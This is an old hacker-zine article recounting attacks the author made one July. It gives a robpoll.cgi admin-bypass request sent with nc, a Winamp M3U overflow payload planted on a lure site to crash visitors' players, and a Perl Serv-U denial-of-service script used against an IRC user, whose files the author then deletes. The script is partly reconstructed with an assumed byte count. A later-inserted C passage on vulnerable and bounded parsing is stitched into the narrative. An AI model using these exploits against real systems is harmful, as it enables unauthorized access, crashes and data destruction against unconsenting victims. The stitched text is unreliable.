A 101 Bytez team article for Hackinthebox mag
[editor’s note: I have tried to preserve the original language of his article as much as possible to reflect its “l33t sp34k” roots, but readability and common grammar at times prohibited this effort.]
Written By : OZONE
Title: July Hack
Discussing : | ROBPOLL.cgi | Winamp buffer overflow | Servu 2.5 e buffer overflow | Vision of NET
Ok so i've talked to a lot of newbies during my netlife and they all wanted to know how i had done this hax or that trick etc., so this year, after having finished work, i decided to write up all the underground things i did in july. But first of all i went on holidaysz in july, so all these tricks were done in about 2 weeks. I'd like to thank Packet-storm & securityfocus for giving us the knowledge and also the power. Please note that this article isn't about my life, but u'll learn all the tricks i've done.
N°1
Ok so first trick: a friend icq'ed me and asked me to scan a website that we'll name IAD. after a little scan i didn't find many security problems, except a cgi called robpoll.cgi,
and i received this:
1: Add New Question
2: Remove Question
3: Change Password
i read alt3kx's article about this security vulnerability and used his attack:
CUT
#!/bin/bash
## - Author alt3kx -
## (www.raza-mexicana.org)
##
## Requesting robpoll.cgi with the "Admin" query string returns the
## administration menu (add/remove question, change password) without
## any authentication. xxx.server.com is the placeholder for the target host.
echo -e "GET http://IAD/cgi-bin/robpoll.cgi?Admin HTTP/1.0\n\n" | nc xxx.server.com 80
CUT
It's a powerful remote attack that led, in my case, to a quite gud l00king j00t //
N°2
Ok so this second trick is really gud. it was a monday night, 03:00, and i found a kewl buffer overflow in the PS (Packet Storm) database concerning the Winamp M3U playlist parser under W$ 9x, so i tried it on mine before attacking lamerz. this is how it works:
The overflow happens when the M3U extension "#EXTINF:" is handled: the size of the parameter following that keyword is not checked, so a long enough value gives total control of execution.
CUT
#EXTM3U
#EXTINF:AAAAAAAAA....AAAAAAAAA
CUT
there should be 280 - 290 A's. save it in a file like Laurent.M3U.
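As an added example (not from the original article and not Winamp's code), here is what this bug class looks like in C: an #EXTINF handler that copies the field into a fixed stack buffer, beside a bounded parser that validates the "<seconds>,<title>" syntax and refuses anything that would not fit. The function names, the 256-byte buffer size and the sample lines are assumptions of this example. Because 'A' is 0x41, a copy that runs past the saved return address makes the CPU resume at 0x41414141, which is the "0000:41414141" error the kiddiez report later in this article.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define TITLE_MAX 256        /* assumed size; Winamp's real buffer size is not on the page */
#define EXTINF "#EXTINF:"

/* Vulnerable pattern (constructed illustration, not Winamp's code): whatever
 * follows "#EXTINF:" is copied into a fixed stack buffer with no length check.
 * Only call this with trusted input; ~290 'A's run past the saved return
 * address, which then reads 0x41414141 ("AAAA"). */
int parse_extinf_unsafe(const char *line)
{
    char title[TITLE_MAX];
    if (strncmp(line, EXTINF, strlen(EXTINF)) != 0)
        return -1;
    strcpy(title, line + strlen(EXTINF));   /* the bug: unbounded copy */
    return (int)strlen(title);
}

/* Hardened parser for "#EXTINF:<seconds>,<title>". Syntax and length are
 * checked before any byte is copied; an over-long title is refused rather
 * than silently truncated. Returns 0 on success, -1 if the line is not an
 * EXTINF line, -2 if malformed, -3 if the title would not fit. */
int parse_extinf_safe(const char *line, long *seconds, char *title, size_t title_cap)
{
    const char *p, *comma, *t;
    char *end;
    long secs;
    size_t len;

    if (strncmp(line, EXTINF, strlen(EXTINF)) != 0)
        return -1;
    p = line + strlen(EXTINF);
    comma = strchr(p, ',');
    if (comma == NULL)
        return -2;              /* the article's "#EXTINF:AAAA..." form: no duration field */
    secs = strtol(p, &end, 10);
    if (end == p || end != comma || secs < -1)
        return -2;              /* duration must be an integer (-1 means unknown) */
    t = comma + 1;
    len = strlen(t);
    while (len > 0 && (t[len - 1] == '\n' || t[len - 1] == '\r'))
        len--;                  /* drop the line ending left by a file read */
    if (len >= title_cap)
        return -3;              /* would overflow: reject the entry */
    memcpy(title, t, len);
    title[len] = '\0';
    *seconds = secs;
    return 0;
}

/* Build a line of the page's shape: "#EXTINF:" (optionally "1,") followed by
 * n_a 'A's. Returns the line length, or -1 if buf is too small. */
int make_poc_line(char *buf, size_t cap, int with_duration, size_t n_a)
{
    int n = snprintf(buf, cap, "%s%s", EXTINF, with_duration ? "1," : "");
    if (n < 0 || (size_t)n + n_a + 1 > cap)
        return -1;
    memset(buf + n, 'A', n_a);
    buf[n + n_a] = '\0';
    return (int)(n + n_a);
}

/* Helpers that return plain values so each case's outcome can be checked. */
int classify_extinf(const char *line)
{
    char title[TITLE_MAX];
    long secs;
    return parse_extinf_safe(line, &secs, title, sizeof title);
}

long extinf_seconds(const char *line)
{
    char title[TITLE_MAX];
    long secs = -999;
    return parse_extinf_safe(line, &secs, title, sizeof title) == 0 ? secs : -999;
}

int extinf_title_is(const char *line, const char *expect)
{
    char title[TITLE_MAX];
    long secs;
    if (parse_extinf_safe(line, &secs, title, sizeof title) != 0)
        return 0;
    return strcmp(title, expect) == 0;
}

int poc_result(int with_duration, size_t n_a)
{
    char buf[1024];
    if (make_poc_line(buf, sizeof buf, with_duration, n_a) < 0)
        return -99;
    return classify_extinf(buf);
}

int main(void)
{
    /* constructed sample lines: one benign entry and the two payload shapes */
    const char *benign = "#EXTINF:213,Some Artist - Some Song\r\n";
    printf("benign line       -> %d (seconds %ld)\n", classify_extinf(benign), extinf_seconds(benign));
    printf("290 A's, no comma -> %d\n", poc_result(0, 290));
    printf("290 A's, with 1,  -> %d\n", poc_result(1, 290));
    return 0;
}
```

The safe parser rejects the article's exact payload as malformed (no duration field) and rejects the same run of A's behind a valid duration as too long; the point is that the length check happens before the copy, not after.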
so after that i did like the author of this trick: i created a winamp XXX skin site
and went into an MP3 irc chan with a l0000t of script kiddiz [unlike the author] and said that i had XXX animated skinz for winamp on my page, and u can trust me, 4 of them told me they had a 0000:41414141 error in winamp while looking at my page :)))
N°3
Ok so i'm sorry, another Win trick, against something i hate: "Serv-U warez XXX ftpz". bwooooo. so i was speaking with my friendz on irc when 3 warez kidz entered the chan (a quite huge chan) and started triggering, saying that they had loooots of XXX with no ratio. so u know, with my friends we say that WAREZ is LAME, and we really think it: it's not because u've got 200 unreleased ISOs that u are underground men! it's just becoz u've got a gud connection. at the end of this doc i'll show u our vision of the net, but it's not the matter n0w. So we saw that one of them was using Serv-U 2.5e. hehe, we know a fuckin trick to burn his c0000mputer, so i used it. note that i didn't modify anything in this c0de, it's perfect:
CUT
#!/usr/bin/perl
#
# FTP Serv-U 2.5e denial-of-service
# Blue Panda - bluepanda@dwarf.box.sk
# http://bluepanda.box.sk/
#
# ----------------------------------------------------------
# Disclaimer: this file is intended as proof of concept, and
# is not intended to be used for illegal purposes. I accept
# no responsibility for damage incurred by the use of it.
# ----------------------------------------------------------
#
# Crashes FTP Serv-U 2.5e by sending it a string of null bytes.
#
use IO::Socket;
$host = "ftp.host.com";
$port = "21";
print "Connecting to $host:$port...";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "failed.\n";
print "done.\n";
$counter = 0;
$buf = "";
# Build the string of null bytes. The script as printed was cut off here;
# the loop below follows the description above (a large number of null
# bytes), and the count of 5000 is assumed, not taken from the original.
while ($counter < 5000) {
    $buf .= "\0";
    $counter++;
}
print "Sending ", length($buf), " null bytes...";
print $socket $buf;
print "done.\n";
close($socket);
CUT
want to know how it works? ok no pb, here we go: if u send FTP Serv-U a string containing a large number of null bytes it will cause a stack fault. The system Serv-U is running on may become
sluggish/unstable and eventually bluescreen. No user/pass combination is needed. :)))
So for da story: we erased all his warez, and yes i know erasing isn't hacking ethic, but he was serving XXX child the bastard, so we erased 4ll and left him a woups.txt with ":)" inside. that's all.
N°4 End
So sorry for this july hacking being a bit Winish, but remember it was only 2 weeks. so here u've got our point of view on the net; u can tell us what u think of it at DCSELL@hotmail.com (it's DCSELL's mail hehe)
TOP Linux Developers (AMEN)
9 Hackers
8 Crackers
7 Rippers
6 ElectroZ
5 Linux Basic users
4 Warezers
3 Carderz
2 Lamerz
1 Basic surfer hacking with macOS
***********************************************************************************
Special shoutz to: the 101 crew (FLAMBY | SLUM) / Bignoze /Vince/ PS_SEcfocus / l1pht / leetdawg / Cyberdom & IAD staff /floz / Benstaff /Fana /Twigg / Mc/
http://www.101bytez.com
***********************************************************************************
1.) Are you a hacker? - JesterS
2.) X-Mail - JesterS
3.) Getting Under the GUI - Liquid Sphear
4.) Opening Simple Ports on Win X - madirish
5.) Commentary on Napster and the Digital Age - SiLeRePrAeSes
6.) Commentary on the Political Aspects of the Internet - SiLeRePrAeSes
7.) How to (re)build your kernel - L33tdawg
8.) A 101 Bytez team article for Hackinthebox mag - OZONE
9.) Examining PE Files - abrams!metaray